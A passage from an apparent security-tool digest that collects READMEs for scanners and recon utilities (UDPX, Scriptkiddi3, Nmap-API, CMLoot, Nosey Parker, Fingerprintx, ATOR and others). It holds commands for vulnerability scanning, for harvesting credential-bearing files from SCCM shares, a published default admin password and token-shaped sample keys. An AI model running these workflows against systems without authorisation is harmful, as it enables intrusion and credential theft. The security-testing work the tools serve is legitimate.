    You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:

    From git:

    git clone https://github.com/nullt3r/udpx
    cd udpx
    go build ./cmd/udpx

    You can find the binary in the current directory.

    Or via go:

    go install -v github.com/nullt3r/udpx/cmd/udpx@latest

    After that, you can find the binary in $HOME/go/bin/udpx. If you want, move binary to /usr/local/bin/ so you can call it directly.

    Supported services

    The UDPX supports more then 45 services. The most interesting are:

    • ipmi
    • snmp
    • ike
    • tftp
    • openvpn
    • kerberos
    • ldap

    The complete list of supported services:

    • ard
    • bacnet
    • bacnet_rpm
    • chargen
    • citrix
    • coap
    • db
    • db
    • digi1
    • digi2
    • digi3
    • dns
    • ipmi
    • ldap
    • mdns
    • memcache
    • mssql
    • nat_port_mapping
    • natpmp
    • netbios
    • netis
    • ntp
    • ntp_monlist
    • openvpn
    • pca_nq
    • pca_st
    • pcanywhere
    • portmap
    • qotd
    • rdp
    • ripv
    • sentinel
    • sip
    • snmp1
    • snmp2
    • snmp3
    • ssdp
    • tftp
    • ubiquiti
    • ubiquiti_discovery_v1
    • ubiquiti_discovery_v2
    • upnp
    • valve
    • wdbrpc
    • wsd
    • wsd_malformed
    • xdmcp
    • kerberos
    • ike

    How to add your own probe?

    Please send a feature request with protocol name and port and I will make it happen. Or add it on your own, the file pkg/probes/probes.go contains all available payloads. Specify the protocol name, port and packet data (hex-encoded).

    {
    Name: "ike",
    Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
    Port: []int{500, 4500},
    },

    Credits

    Disclaimer

    I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.

    License

    UDPX is distributed under MIT License.



    Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

    How it works โ€ข Installation โ€ข Usage โ€ข MODES โ€ข For Developers โ€ข Credits

    Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

    SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

    In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

    SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

    [Thanks ChatGPT for the Description]


    How it Works ?

    This tool mainly performs 3 tasks

    1. Effective Subdomain Enumeration from Various Tools
    2. Get URLs with open HTTP and HTTPS service.
    3. Run a Nuclei and other scans on previous output So basically, this is an autmation script for your initial recon in bugbounty

    Install SCRIPTKIDDI3

    SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-

    git clone https://github.com/thecyberneh/scriptkiddi3.git
    cd scriptkiddi3
    bash installer.sh

    Usage

    scriptkiddi3 -h

    This will display help for the tool. Here are all the switches it supports.

    Vulnerability Detection with Nuclei, and Scan for SUBDOMAINE TAKEOVER [FLAGS:] [TARGET:] -d, --domain target domain to scan [CONFIG:] -c, --config path of your configuration file for subfinder [HELP:] -h, --help to get help menu [UPDATE:] -u, --update to update tool [Examples:] Run scriptkiddi3 in full Exploitation mode scriptkiddi3 -m EXP -d target.com Use your own CONFIG file for subfinder scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode scriptkiddi3 -m SUB -d target.com Run scriptkiddi3 in URL ENUMERATION mode scriptkiddi3 -m SUB -d target.com " dir="auto">
    [ABOUT:]
    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
    A recon and initial vulnerability detection tool built using shell script and open source tools.


    [Usage:]
    scriptkiddi3 [MODE] [FLAGS]
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    [MODES:]
    ['-m'/'--mode']
    Available Options for MODE:
    SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    URL | url Run scriptkiddi3 in URL ENUMERATION mode
    EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


    Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
    Vulnerability Detection with Nuclei,
    an d Scan for SUBDOMAINE TAKEOVER

    [FLAGS:]
    [TARGET:] -d, --domain target domain to scan

    [CONFIG:] -c, --config path of your configuration file for subfinder

    [HELP:] -h, --help to get help menu

    [UPDATE:] -u, --update to update tool

    [Examples:]
    Run scriptkiddi3 in full Exploitation mode
    scriptkiddi3 -m EXP -d target.com


    Use your own CONFIG file for subfinder
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com


    Run scriptkiddi3 in URL ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com

    MODES

    1. FULL EXPLOITATION MODE

    Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

      scriptkiddi3 -m EXP -d target.com

    FULL EXPLOITATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • Effective URL Enumeration ( HTTP and HTTPs service )
    • Run Vulnerability Detection with Nuclei
    • Subdomain Takeover Test on previous results

    2. SUBDOMAIN ENUMERATION MODE

    Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

      scriptkiddi3 -m SUB -d target.com

    SUBDOMAIN ENUMERATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • You can use this mode if you only want to get subdomains from this tool or we can say Automation of Subdmain Enumeration by different tools

    3. URL ENUMERATION MODE

    Run scriptkiddi3 in URL ENUMERATION MODE

      scriptkiddi3 -m URL -d target.com

    URL ENUMERATION MODE contains following functions

    • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

    Using your own CONFIG File for subfinder

      scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

    You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder

    Updating tool to latest version You can run following command to update tool

      scriptkiddi3 -u

    An Example of config.yaml

    binaryedge:
    - 0bf8919b-aab9-42e4-9574-d3b639324597
    - ac244e2f-b635-4581-878a-33f4e79a2c13
    censys:
    - ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
    certspotter: []
    passivetotal:
    - sample-email@user.com:sample_password
    securitytrails: []
    shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    github:
    - ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
    - ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
    zoomeye:
    - zoomeye_username:zoomeye_password

    For Developers

    If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

    If you have any other queries, you can always contact me on Twitter(thecyberneh)

    Credits

    I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



    Nmap-API - Uses Python3.10, Debian, python-Nmap, And Flask Framework To Create A Nmap API That Can Do Scans With A Good Speed Online And Is Easy To Deploy


    Uses python3.10, Debian, python-Nmap, and flask framework to create a Nmap API that can do scans with a good speed online and is easy to deploy.

    This is a implementation for our college PCL project which is still under development and constantly updating.


    API Reference

    Get all items

      GET /api/p1/{username}:{password}/{target}
    GET /api/p2/{username}:{password}/{target}
    GET /api/p3/{username}:{password}/{target}
    GET /api/p4/{username}:{password}/{target}
    GET /api/p5/{username}:{password}/{target}
    Parameter Type Description
    username string Required. username of the current user
    password string Required. current user password
    target string Required. The target Hostname and IP

    Get item

      GET /api/p1/
    GET /api/p2/
    GET /api/p3/
    GET /api/p4/
    GET /api/p5/
    Parameter Return data Description Nmap Command
    p1 json Effective Scan -Pn -sV -T4 -O -F
    p2 json Simple Scan -Pn -T4 -A -v
    p3 json Low Power Scan -Pn -sS -sU -T4 -A -v
    p4 json Partial Intense Scan -Pn -p- -T4 -A -v
    p5 json Complete Intense Scan -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

    Auth and User management

      POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
    POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
    POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
    POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
    POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
    • make sure you use the ADMIN CREDS MENTIONED BELOW
    Parameter Type Description
    admin-username String Admin username
    admin-passwd String Admin password
    id String Id for newly added user
    username String Username of the newly added user
    passwd String Password of the newly added user
    t-username String Target username
    t-user-id String Target userID
    t-userpass String Target users password
    new-t-username String New username for the target
    new-t-user-id String New userID for the target
    new-t-userpass String New password for the target

    DEFAULT CREDENTIALS

    ADMINISTRATOR : zAp6_oO~t428)@,



    Certwatcher - Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


    CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.


    Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing, exposed tokens, secret api key patterns using regular expressions defined by YAML templates.

    Get Started

    Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

    Useful Links

    Contribution

    If you want to contribute to this project, follow the steps below:

    • Fork this repository.
    • Create a new branch with your feature: git checkout -b my-new-feature
    • Make changes and commit the changes: git commit -m 'Adding a new feature'
    • Push to the original branch: git push origin my-new-feature
    • Open a pull request.

    Authors



    CMLoot - Find Interesting Files Stored On (System Center) Configuration Manager (SCCM/CM) SMB Shares


    CMLoot was created to easily find interesting files stored on System Center Configuration Manager (SCCM/CM) SMB shares. The shares are used for distributing software to Windows clients in Windows enterprise environments and can contains scripts/configuration files with passwords, certificates (pfx), etc. Most SCCM deployments are configured to allow all users to read the files on the shares, sometimes it is limited to computer accounts.

    The Content Library of SCCM/CM have a "complex" (annoying) file structure which CMLoot will untangle for you: https://techcommunity.microsoft.com/t5/configuration-manager-archive/understanding-the-configuration-manager-content-library/ba-p/273349

    Essentially the DataLib folder contains .INI files, the .INI file are named the original filename + .INI. The .INI file contains a hash of the file, and the file itself is stored in the FileLib in format of <folder name: 4 first chars of the hash>\fullhash.


    CM Access Accounts

    It is possible to apply Access control to packages in CM. This however only protects the folder for the file descriptor (DataLib), not the actual file itself. CMLoot will during inventory record any package that it can't access (Access denied) to the file _noaccess.txt. Invoke-CMLootHunt can then use this file to enumerate the actual files that the access control is trying to protect.

    OPSEC

    Windows Defender for Endpoint (EDR) or other security mechanisms might trigger because the script parses a lot of files over SMB.

    HOWTO

    Find CM servers by searching for them in Active Directory or by fetching this reqistry key on a workstation with System Center installed:

    (Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\SMS\DP -Name ManagementPoints).ManagementPoints

    There may be multiple CM servers deployed and they can contain different files so be sure to find all of them.

    Then you need to create an inventory file which is just a text file containing references to file descriptors (.INI). The following command will parse all .INI files on the SCCM server to create a list of files available.

    PS> Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt

    Then use the inventory file created above to download files of interest:

    Select files using GridView (Milage may vary with large inventory files):

    PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -GridSelect

    Download a single file, by coping a line in the inventory text:

    PS> Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml

    Download all files with a certain file extension:

    PS> Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension ps1

    Files will by default download to CMLootOut in the folder from which you execute the script, can be changed with -OutFolder parameter. Files are saved in the format of (folder: filext)\(first 4 chars of hash>_original filename).

    Hunt for files that CMLootInventory found inaccessible:

    Invoke-CMLootHunt -SCCMHost sccm -NoAccessFile sccmfiles_noaccess.txt

    Bulk extract MSI files:

    Invoke-CMLootExtract -Path .\CMLootOut\msi

    DEMO

    Run inventory, scanning available files:

    Select files using GridSelect:

    Download all extensions:

    Hunt "inaccessible" files and MSI extract:

    Author

    Tomas Rzepka / WithSecure



    Noseyparker - A Command-Line Program That Finds Secrets And Sensitive Information In Textual Data And Git History


    Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.

    Key features:

    • It supports scanning files, directories, and the entire history of Git repositories
    • It uses regular expression matching with a set of 95 patterns chosen for high signal-to-noise based on experience and feedback from offensive security engagements
    • It groups matches together that share the same secret, further emphasizing signal over noise
    • It is fast: it can scan at hundreds of megabytes per second on a single core, and is able to scan 100GB of Linux kernel source history in less than 2 minutes on an older MacBook Pro

    This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.


    Building from source

    1. (On x86_64) Install the Hyperscan library and headers for your system

    On macOS using Homebrew:

    brew install hyperscan pkg-config

    On Ubuntu 22.04:

    apt install libhyperscan-dev pkg-config

    1. (On non-x86_64) Build Vectorscan from source

    You will need several dependencies, including cmake, boost, ragel, and pkg-config.

    Download and extract the source for the 5.4.8 release of Vectorscan:

    wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz

    Build with cmake:

    cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build

    Set the HYPERSCAN_ROOT environment variable so that Nosey Parker builds against your from-source build of Vectorscan:

    export HYPERSCAN_ROOT="$PWD/build"

    Note: The Nosey Parker Dockerfile builds Vectorscan from source and links against that.

    2. Install the Rust toolchain

    Recommended approach: install from https://rustup.rs

    3. Build using Cargo

    cargo build --release

    This will produce a binary at target/release/noseyparker.

    Docker Usage

    A prebuilt Docker image is available for the latest release for x86_64:

    docker pull ghcr.io/praetorian-inc/noseyparker:latest

    A prebuilt Docker image is available for the most recent commit for x86_64:

    docker pull ghcr.io/praetorian-inc/noseyparker:edge

    For other architectures (e.g., ARM) you will need to build the Docker image yourself:

    docker build -t noseyparker .

    Run the Docker image with a mounted volume:

    docker run -v "$PWD":/opt/ noseyparker

    Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.

    Usage quick start

    The datastore

    Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan command if needed. You can also create a datastore explicitly using the datastore init -d PATH command.

    Scanning filesystem content for secrets

    Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.

    For example, if you have a Git clone of CPython locally at cpython.git, you can scan its entire history with the scan command. Nosey Parker will create a new datastore at np.cpython and saves its findings there.

    $ noseyparker scan --datastore np.cpython cpython.git
    Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
    Scanning content โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ 100% 28.30 GiB/28.30 GiB [00:00:53]
    Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches

    Rule Distinct Groups Total Matches
    โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    PEM-Encoded Private Key 1,076 1,1 92
    Generic Secret 331 478
    netrc Credentials 42 3,201
    Generic API Key 2 31
    md5crypt Hash 1 2

    Run the `report` command next to show finding details.

    Scanning Git repos by URL, GitHub username, or GitHub organization name

    Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL, --github-user NAME, and --github-org NAME options to scan allow you to specify repositories of interest.

    For example, to scan the Nosey Parker repo itself:

    $ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker

    For example, to scan accessible repositories belonging to octocat:

    $ noseyparker scan --datastore np.noseyparker --github-user octocat

    These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

    See noseyparker help scan for more details.

    Summarizing findings

    Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:

    $ noseyparker summarize --datastore np.cpython

    Rule Distinct Groups Total Matches
    โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    PEM-Encoded Private Key 1,076 1,192
    Generic Secret 331 478
    netrc Credentials 42 3,201
    Generic API Key 2 31
    md5crypt Hash 1 2

    Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

    Reporting detailed findings

    To see details of Nosey Parker's findings, use the report command. This prints out a text-based report designed for human consumption:

    (Note: the findings above are synthetic, invalid secrets.) Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

    Enumerating repositories from GitHub

    To list URLs for repositories belonging to GitHub users or organizations, use the github repos list command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:

    $ noseyparker github repos list --user octocat
    https://github.com/octocat/Hello-World.git
    https://github.com/octocat/Spoon-Knife.git
    https://github.com/octocat/boysenberry-repo-1.git
    https://github.com/octocat/git-consortium.git
    https://github.com/octocat/hello-worId.git
    https://github.com/octocat/linguist.git
    https://github.com/octocat/octocat.github.io.git
    https://github.com/octocat/test-repo1.git

    An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

    Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

    See noseyparker help github for more details.

    Getting help

    Running the noseyparker binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h.

    Tip: More detailed help is available with the help command or long-form --help option.

    Contributing

    Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.

    If you are considering making significant code changes, please open an issue first to start discussion.

    License

    Nosey Parker is licensed under the Apache License, Version 2.0.

    Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.



    Fingerprintx - Standalone Utility For Service Discovery On Open Ports!



    fingerprintx is a utility similar to httpx that also supports fingerprinting services like as RDP, SSH, MySQL, PostgreSQL, Kafka, etc. fingerprintx can be used alongside port scanners like Naabu to fingerprint a set of ports identified during a port scan. For example, an engineer may wish to scan an IP range and then rapidly fingerprint the service running on all the discovered ports.


    Features

    • Fast fingerprinting of exposed services
    • Application layer service discovery
    • Plays nicely with other command line tools
    • Automatic metadata collection from identified services

    Supported Protocols:

    SERVICE TRANSPORT SERVICE TRANSPORT
    HTTP TCP REDIS TCP
    SSH TCP MQTT3 TCP
    MODBUS TCP VNC TCP
    TELNET TCP MQTT5 TCP
    FTP TCP RSYNC TCP
    SMB TCP RPC TCP
    DNS TCP OracleDB TCP
    SMTP TCP RTSP TCP
    PostgreSQL TCP MQTT5 TCP (TLS)
    RDP TCP HTTPS TCP (TLS)
    POP3 TCP SMTPS TCP (TLS)
    KAFKA TCP MQTT3 TCP (TLS)
    MySQL TCP RDP TCP (TLS)
    MSSQL TCP POP3S TCP (TLS)
    LDAP TCP LDAPS TCP (TLS)
    IMAP TCP IMAPS TCP (TLS)
    SNMP UDP Kafka TCP (TLS)
    OPENVPN UDP NETBIOS-NS UDP
    IPSEC UDP DHCP UDP
    STUN UDP NTP UDP
    DNS UDP

    Installation

    From Github

    go install github.com/praetorian-inc/fingerprintx/cmd/fingerprintx@latest

    From source (go version > 1.18)

    $ git clone git@github.com:praetorian-inc/fingerprintx.git
    $ cd fingerprintx

    # with go version > 1.18
    $ go build ./cmd/fingerprintx
    $ ./fingerprintx -h

    Docker

    $ git clone git@github.com:praetorian-inc/fingerprintx.git
    $ cd fingerprintx

    # build
    docker build -t fingerprintx .

    # and run it
    docker run --rm fingerprintx -h
    docker run --rm fingerprintx -t praetorian.com:80 --json

    Usage

    fingerprintx -h

    The -h option will display all of the supported flags for fingerprintx.

    Usage:
    fingerprintx [flags]
    TARGET SPECIFICATION:
    Requires a host and port number or ip and port number. The port is assumed to be open.
    HOST:PORT or IP:PORT
    EXAMPLES:
    fingerprintx -t praetorian.com:80
    fingerprintx -l input-file.txt
    fingerprintx --json -t praetorian.com:80,127.0.0.1:8000

    Flags:
    --csv output format in csv
    -f, --fast fast mode
    -h, --help help for fingerprintx
    --json output format in json
    -l, --list string input file containing targets
    -o, --output string output file
    -t, --targets strings target or comma separated target list
    -w, --timeout int timeout (milliseconds) (default 500)
    -U, --udp run UDP plugins
    -v, --verbose verbose mode

    The fast mode will only attempt to fingerprint the default service associated with that port for each target. For example, if praetorian.com:8443 is the input, only the https plugin would be run. If https is not running on praetorian.com:8443, there will be NO output. Why do this? It's a quick way to fingerprint most of the services in a large list of hosts (think the 80/20 rule).

    Running Fingerprintx

    With one target:

    $ fingerprintx -t 127.0.0.1:8000
    http://127.0.0.1:8000

    By default, the output is in the form: SERVICE://HOST:PORT. To get more detailed service output specify JSON with the --json flag:

    $ fingerprintx -t 127.0.0.1:8000 --json
    {"ip":"127.0.0.1","port":8000,"service":"http","transport":"tcp","metadata":{"responseHeaders":{"Content-Length":["1154"],"Content-Type":["text/html; charset=utf-8"],"Date":["Mon, 19 Sep 2022 18:23:18 GMT"],"Server":["SimpleHTTP/0.6 Python/3.10.6"]},"status":"200 OK","statusCode":200,"version":"SimpleHTTP/0.6 Python/3.10.6"}}

    Pipe in output from another program (like naabu):

    $ naabu 127.0.0.1 -silent 2>/dev/null | fingerprintx
    http://127.0.0.1:8000
    ftp://127.0.0.1:21

    Run with an input file:

    $ cat input.txt | fingerprintx
    http://praetorian.com:80
    telnet://telehack.com:23

    # or if you prefer
    $ fingerprintx -l input.txt
    http://praetorian.com:80
    telnet://telehack.com:23

    With more metadata output:

    Why Not Nmap?

    Nmap is the standard for network scanning. Why use fingerprintx instead of nmap? The main two reasons are:

    • fingerprintx works smarter, not harder: the first plugin run against a server with port 8080 open is the http plugin. The default service approach cuts down scanning time in the best case. Most of the time the services running on port 80, 443, 22 are http, https, and ssh -- so that's what fingerprintx checks first.
    • fingerprintx supports json output with the --json flag. Nmap supports numerous output options (normal, xml, grep), but they are often hard to parse and script appropriately. fingerprintx supports json output which eases integration with other tools in processing pipelines.

    Notes

    • Why do you have a third_party folder that imports the Go cryptography libraries?
      • Good question! The ssh fingerprinting module identifies the various cryptographic options supported by the server when collecting metadata during the handshake process. This makes use of a few unexported functions, which is why the Go cryptography libraries are included here with an export.go file.
    • Fingerprintx is not designed to identify open ports on the target systems and assumes that every target:port input is open. If none of the ports are open there will be no output as there are no services running on the targets.
    • How does this compare to zgrab2?
      • The zgrab2 command line usage (and use case) is slightly different than fingerprintx. For zgrab2, the protocol must be specified ahead of time: echo praetorian.com | zgrab2 http -p 8000, which assumes you already know what is running there. For fingerprintx, that is not the case: echo praetorian.com:8000 | fingerprintx. The "application layer" protocol scanning approach is very similar.

    Acknowledgements

    fingerprintx is the work of a lot of people, including our great intern class of 2022. Here is a list of contributors so far:



    PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library



    Graphical interface for PortEx, a Portable Executable and Malware Analysis Library

    Download

    Releases page

    Features

    • Header information from: MSDOS Header, Rich Header, COFF File Header, Optional Header, Section Table
    • PE Structures: Import Section, Resource Section, Export Section, Debug Section
    • Scanning for file format anomalies
    • Visualize file structure, local entropies and byteplot, and save it as PNG
    • Calculate Shannon Entropy, Imphash, MD5, SHA256, Rich and RichPV hash
    • Overlay and overlay signature scanning
    • Version information and manifest
    • Icon extraction and saving as PNG
    • Customized signature scanning via Yara. Internal signature scans using PEiD signatures and an internal filetype scanner.

    Supported OS and JRE

    I test this program on Linux and Windows. But it should work on any OS with JRE version 9 or higher.

    Future

    I will be including more and more features that PortEx already provides.

    These features include among others:

    • customized visualization
    • extraction and conversion of icons to .ICO files
    • dumping of sections, overlay, resources
    • export reports to txt, json, csv

    Some of these features are already provided by PortexAnalyzer CLI version, which you can find here: PortexAnalyzer CLI

    Donations

    I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs

    License

    License



    Ator - Authentication Token Obtain and Replace Extender


    The plugin is created to help automated scanning using Burp in the following scenarios:

    1. Access/Refresh token
    2. Token replacement in XML,JSON body
    3. Token replacement in cookies
      The above can be achieved using complex macro, session rules or Custom Extender in some scenarios. The rules become tricky and do not work in scenarios where the replacement text is either JSON, XML.

    Key advantages:

    1. We have also achieved in-memory token replacement to avoid duplicate login requests like in both custom extender, macros/session rules.
    2. Easy UX to help obtain data (from response) and replace data (in requests) using regex. This helps achieve complex scenarios where response body is JSON, XML and the request text is also JSON, XML, form data etc.
    3. Scan speed - the scan speed increases considerably because there are no extra login requests. There is something called the "Trigger Request" which is the error condition (also includes regex) when the login requests are triggered. The error condition can include (response code = 401 and body contains "Unauthorized request")

    The inspiration for the plugin is from ExtendedMacro plugin: https://github.com/FrUh/ExtendedMacro

    Blogs

    1. Authentication Token Obtain and Replace (ATOR)ย Burp Pluginย - Part1 - Single step login sequence and single token extraction
    2. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part2 - Multi step login sequence and multiple extraction

    Getting Started

    1. Install Java and Maven
    2. Clone the repository
    3. Run the "mvn clean install" command in cloned repo of where pom.xml is present
    4. Take the generated jar with dependencies from the target folder

    Prerequisites

    1. Make sure java environment is setup in your machine.
    2. Confgure the Burp Suite to listen the Proxy traffic
    3. Configure the java environment from extender tab of BURP

    For usage with test application (Install this testing application (Tiredful application) from https://github.com/payatu/Tiredful-API)

    Steps

    1. Identify the request which provides the error
    2. Identify the Error Pattern (details in section below)
    3. Obtain the data from the response using regex (see sample regex values)
    4. Replace this data on the request (use same regex as step 3 along with the variable name)

    Error Pattern:

    Totally there are 4 different ways you can specify the error condition.

    1. Status Code: 401, 400
    2. Error in Body: give any text from the body content (Example: Access token expired)
    3. Error in Header: give any text from header(Example: Unauthorized)
    4. Free Form: use this to give multiple condition (st=400 && bd=Access token expired || hd=Unauthorized)

    Regex with samples

    1. Use Authorization: Bearer \w* to match Authorization: Bearer AXXFFPPNSUSSUSSNSUSN
    2. Use Authorization: Bearer ([\w+_-.]*) to match Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN

    Break down into end to end tests

    1. Finding the Invalid request:
      • http://HOST:PORT/api/v1/exams/MQ==/ with invalid Bearer token.
    2. Identifying Error Pattern:
      • The above request will give you 401, here error condition is Status Code = 401
    3. Match regex with request data
      • Authorization: Bearer \w* - this regex will match access token which is passed.
    4. Replacement - How to replace
      • Replace the matched text(step 3 regex) with extracted value (Extraction configuration discussed in below, say varibale name is "token")
      • Authorization: Bearer token - extracted token will be replaced.

    Usage with test application

    Idea : Record the Tiredful application request in BURP, configure the ATOR extender, check whether token is replaced by ATOR.

    1. Open the testing application in browser which you configured with BURP
      • Generate a token from http://HOST:PORT/handle-user-token/
      • Send the request http://HOST:PORT/api/v1/exams/MQ==/ by passing Authorization Beaer token(get it from above step)
    2. Add the ATOR jar file as a extender in BURP
    3. Right Click on the request(/handle-user-token) in Proxy history and send it to Authentication Token Optain and Replace Extender
    4. Add the new entry in Extraction configuration by selecting the "access_token" value and give name as "token"(it may be any name) Note: For this application,one request is enough to generate a token.Token can also get generated after multiple requests
    5. TRIGGER CONDITION:
      • Macro steps will get executed if the condition is matched.
      • After execution of steps, replace the incoming request by taking values from "Pattern" and "Replacement Area" if specified.
      • For our testing,
        • Error condition is 401(Status Code)
        • Pattern is "Authorization: Bearer \w*" (Specify the regex Pattern how you want to replace with extraction values)
        • Replacement Area is "Authentication: Bearer <NAME which you gave in STEP 4>"
      • Click on "Add" Button.
    6. For this example, one replacement is enough to make the incoming request as valid but you can add mutiple replacement for a single condition.
    7. Hit the invalid request from Repeater and check the req/res flows in either FLOW/Logger++
      • Invalid Bearer token(http://HOST:PORT/api/v1/exams/MQ==/) from Repeater makes the response as 401.
      • Extender will match this condition and start running the recorded steps, extract the "access_token"
      • Replace the access token(from step ii) in actual response(from Repeater) and makes this invalid request as valid.
      • In the repeater console, you see 200 OK response.
    8. Do the Step7 again and check the flow
      • This time extender will not invoke the steps because existing token is valid and so it uses that.

    Built With

    • SWING - Used to add panel

